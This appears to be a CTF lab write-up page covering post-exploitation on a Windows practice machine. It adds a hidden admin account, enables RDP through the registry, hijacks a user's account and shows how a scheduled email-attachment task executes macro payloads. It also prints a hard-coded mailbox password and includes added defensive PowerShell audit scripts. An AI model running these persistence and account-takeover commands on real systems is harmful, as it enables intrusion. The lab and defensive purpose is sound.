Beyond
This is the beyond page, where additional post-exploitation enumeration and assessment are carried out as SYSTEM after compromising the target system.
C:\WINDOWS\system32> net user adm1n qwe123 /ADD && net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
C:\WINDOWS\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
Adding an admin user and enabling RDP
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ xfreerdp /u:adm1n /p:'qwe123' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
The ela arwel user had an ongoing session, as previously enumerated. The scheduled task \Check Email, running as ela arwel, executes the C:\Users\Ela Arwel\check_email.ps1 file at an interval of 3 minutes.
C:\Users\Ela Arwel\check_email.ps1
PS C:\WINDOWS\system32> cat "C:\Users\Ela Arwel\check_email.ps1"
### Close everything
Remove-Item -Path 'C:\Users\Ela Arwel\Desktop\email_files\*'
Stop-Process -Name 'soffice.*'
### Import the dll
[Reflection.Assembly]::LoadFile("C:\ImapX.dll")
### Create a client object
$client = New-Object ImapX.ImapClient
###set the fetching mode to retrieve the part of message you want to retrieve,
###the less the better
$client.Behavior.MessageFetchMode = "Full"
$client.Host = "localhost"
$client.Port = 143
$client.Connect()
$user = "mailadmin"
$password = "7vRx1jii9"
$client.Login($user,$password)
$client.Behavior.AutoPopulateFolderMessages = $true
$messages = $client.Folders.Inbox.Search("ALL", $client.Behavior.MessageFetchMode, 1000)
if ($messages.Count -gt 0) {
    foreach($m in $messages){
        $m.Subject
        foreach($r in $m.Attachments){
            $r.Download()
            $r.Save('C:\Users\Ela Arwel\Desktop\email_files\')
        }
        $m.Remove();
    }
    Invoke-Item 'C:\Users\Ela Arwel\Desktop\email_files\*.xls'
    Invoke-Item 'C:\Users\Ela Arwel\Desktop\email_files\*.ods'
}
$client.Logout();
This PowerShell script connects to a local IMAP email server, retrieves emails, downloads their attachments, and opens specific file types. Here’s what it does step by step:
- Cleanup
  - Deletes all files in C:\Users\Ela Arwel\Desktop\email_files\.
  - Closes any running instances of LibreOffice (soffice.*).
- IMAP Connection Setup
  - Loads the ImapX.dll library for handling IMAP communication.
  - Creates an IMAP client object.
  - Sets the email retrieval mode to “Full” (fetching complete messages).
  - Connects to the IMAP server at localhost:143.
  - Logs in with the username mailadmin and the password 7vRx1jii9.
- Email Processing
  - Enables automatic fetching of messages.
  - Retrieves up to 1000 emails from the Inbox.
  - If there are emails:
    - Iterates through them, displaying the subject line.
    - Downloads all attachments and saves them to C:\Users\Ela Arwel\Desktop\email_files\.
    - Deletes the processed emails from the inbox.
- File Execution
  - Opens any downloaded .xls (Excel) or .ods (OpenDocument Spreadsheet) files with their default application.
- Logout
  - Logs out from the IMAP server.
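From a defensive angle, the three things that make this task dangerous are visible in the script itself: a hard-coded mailbox credential, a reflective load of a DLL from the filesystem root, and Invoke-Item on whatever attachment arrived in the inbox, all repeating every few minutes under a user account. The following PowerShell is an added example written for this page, not code from the original write-up or from the target: it walks the scheduled tasks in a folder, finds the ones whose action runs a .ps1 file, and flags those patterns in the script content. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later), read access to the referenced scripts, and that a task action carries the script path either in Execute or in Arguments; the pattern names are my own labels.

```powershell
# Added example (not from the original write-up): audit scheduled tasks that run a
# PowerShell script and flag the risky patterns seen in check_email.ps1.
# Assumes the ScheduledTasks module and read access to the script files.

$riskyPatterns = @(
    @{ Name = 'hard-coded credential';        Regex = '\$(user|password|pass|pwd)\s*=\s*[''"]' }
    @{ Name = 'reflective assembly load';     Regex = '\[Reflection\.Assembly\]::Load' }
    @{ Name = 'opens files with default app'; Regex = '\bInvoke-Item\b' }
    @{ Name = 'deletes files';                Regex = '\bRemove-Item\b' }
)

function Get-TaskScriptPath {
    # Pull a .ps1 path out of the action; quoted paths with spaces (e.g. "Ela Arwel") are expected
    param($Action)
    foreach ($field in @($Action.Execute, $Action.Arguments)) {
        if ($field -and $field -match '(?<path>[A-Za-z]:\\[^"'']*?\.ps1)') { return $Matches['path'] }
    }
    return $null
}

function Get-ScheduledScriptAudit {
    [CmdletBinding()]
    param([string]$TaskPath = '\')   # root task folder, where "\Check Email" lives

    foreach ($task in (Get-ScheduledTask -TaskPath $TaskPath -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            $scriptPath = Get-TaskScriptPath $action
            if (-not $scriptPath -or -not (Test-Path -LiteralPath $scriptPath)) { continue }

            $content  = Get-Content -LiteralPath $scriptPath -Raw
            $findings = foreach ($p in $riskyPatterns) { if ($content -match $p.Regex) { $p.Name } }
            $info     = $task | Get-ScheduledTaskInfo
            $trigger  = $task.Triggers | Select-Object -First 1

            [pscustomobject]@{
                Task       = $task.TaskPath + $task.TaskName
                RunAs      = $task.Principal.UserId
                Script     = $scriptPath
                Interval   = $trigger.Repetition.Interval      # ISO 8601 duration, e.g. PT3M
                LastResult = ('0x{0:X}' -f $info.LastTaskResult) # 0x0 = last run succeeded
                Findings   = ($findings -join '; ')
            }
        }
    }
}

# Only show tasks where at least one pattern matched
Get-ScheduledScriptAudit | Where-Object Findings | Format-Table -AutoSize -Wrap
```

LastResult is worth keeping in the report: a task that is scheduled every three minutes but keeps returning a non-zero result is exactly the "unreliable" behaviour described in the next section, and the interval tells you how often a malicious attachment would be opened once the task does work.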
Execution
This was extremely unreliable. It still failed to work even when the \Check Email task was run manually.
PS C:\Users\Ela Arwel\Desktop\email_files> Invoke-Item .\*.ods
It does work once the macro security is manually set to Low. This required opening LibreOffice for the first time.
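Because the whole chain hinges on the LibreOffice macro security level of the ela arwel profile, that setting is the one a defender should be able to check without opening the GUI. The following PowerShell is an added example for this page, not code from the original write-up: it reads each user's registrymodifications.xcu, where LibreOffice stores per-user configuration changes, and reports the MacroSecurityLevel value (0 = Low, 1 = Medium, 2 = High, 3 = Very High; no entry means the default, High). It assumes the default profile root C:\Users and the LibreOffice "4" user-profile layout under AppData\Roaming.

```powershell
# Added example (not from the original write-up): report the LibreOffice macro
# security level per user profile. Assumes C:\Users as profile root and the
# LibreOffice\4\user profile layout; an absent value means the default (High).

$levelNames = @{ 0 = 'Low'; 1 = 'Medium'; 2 = 'High'; 3 = 'Very High' }

function Get-LibreOfficeMacroSecurity {
    param([string]$ProfileRoot = 'C:\Users')

    foreach ($userDir in (Get-ChildItem -Path $ProfileRoot -Directory)) {
        $xcu = Join-Path $userDir.FullName 'AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu'
        if (-not (Test-Path -LiteralPath $xcu)) { continue }   # LibreOffice never started by this user

        [xml]$doc = Get-Content -LiteralPath $xcu -Raw
        $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
        $ns.AddNamespace('oor', 'http://openoffice.org/2001/registry')
        # item/prop/value elements carry no prefix; only their attributes are oor:-qualified
        $node = $doc.SelectSingleNode(
            "//item[@oor:path='/org.openoffice.Office.Common/Security/Scripting']" +
            "/prop[@oor:name='MacroSecurityLevel']/value", $ns)

        $level = if ($node) { [int]$node.InnerText } else { 2 }
        [pscustomobject]@{
            User          = $userDir.Name
            Level         = $level
            Name          = $levelNames[$level]
            ExplicitlySet = [bool]$node
            Settings      = $xcu
            LastWrite     = (Get-Item -LiteralPath $xcu).LastWriteTime
        }
    }
}

Get-LibreOfficeMacroSecurity | Format-Table -AutoSize
```

A profile reporting Level 0 with a recent LastWrite is the condition under which the scheduled task above will execute macros from incoming attachments; the same file can be watched for changes as a cheap detection on hosts where LibreOffice is deployed.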
XAMPP
The target system has an Apache XAMPP instance configured to host both FileZilla and Mercury.
Mercury
Veyon
Veyon (Virtual Eye On Networks) is a free and open source software for monitoring and controlling computers across multiple platforms. Veyon supports users in teaching in digital learning environments, performing virtual trainings or giving remote support.
It uses the VNC protocol, and the target system runs it over port 11100.
Troubleshooting
PS C:\Users\Ela Arwel\Veyon> mv veyon-service.exe.bak veyon-service.exe
PS C:\Users\Ela Arwel\Veyon> cmd /c sc stop VeyonService && sc start VeyonService
SERVICE_NAME: VeyonService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x3a98
PID : 7388
FLAGS :
Restoring the original veyon-service.exe file and restarting the VeyonService service
C:\Users\Ela Arwel> net user "ela arwel" qwe123
The command completed successfully.
Resetting the password of the ela arwel user
Starting the master application
The ela arwel user had an ongoing session. The user might have used this software to enable the macro.
Indeed.
Establishing an RDP session as the admin account kicked the ela arwel user out of the session. That might be the reason why the scheduled task wasn’t executing.
Logon script
PS C:\Users\Ela Arwel\Veyon> ls "C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Directory: C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/16/2020 9:25 PM 1227 LibreOffice 7.0.lnk
-a---- 10/16/2020 8:33 PM 671 XAMPP Control Panel.lnk
PS C:\Users\Ela Arwel\Veyon> cat "C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LibreOffice 7.0.lnk"
[binary .lnk data omitted; the readable strings show the target C:\Program Files\LibreOffice\program\quickstart.exe with the working directory C:\Program Files\LibreOffice\program]
PS C:\Users\Ela Arwel\Veyon> cat "C:\Users\ela arwel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XAMPP Control Panel.lnk"
[binary .lnk data omitted; the readable strings show the target C:\xampp\xampp-control.exe, the description "XAMPP Control Panel", and the working directory C:\xampp]
There are two .lnk files configured in the Startup folder of the ela arwel user.
PS C:\Users\Ela Arwel\Veyon> net user "ela arwel" qwe123 && net localgroup "Remote Desktop Users" /ADD "ela arwel"
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ xfreerdp /u:"ela arwel" /p:'qwe123' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
Indeed. The ela arwel user already had an ongoing session with a couple of windows open, executing something.
The LibreOffice document recovery window shows that the program had crashed. This may be the reason why it wasn’t executing.
Upon closing the windows, the scheduled task ran normally and executed my payloads.